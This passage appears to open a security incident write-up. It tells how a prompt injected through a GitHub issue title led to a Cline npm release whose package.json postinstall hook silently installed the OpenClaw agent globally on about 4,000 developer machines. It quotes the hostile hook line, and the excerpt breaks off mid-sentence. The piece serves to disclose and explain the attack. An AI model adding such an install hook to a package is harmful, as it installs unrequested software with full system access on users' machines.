Five steps from a GitHub issue title to 4,000 compromised developer machines. The entry point was natural language. On February 17, 2026, someone published [email protected] to npm. The CLI binary was byte-identical to the previous version. The only change was one line in package.json: "postinstall": "npm install -g openclaw@latest" For the next eight hours, every developer who installed or updated Cline got OpenClaw - a separate AI agent with full system access - installed globally on their machine w...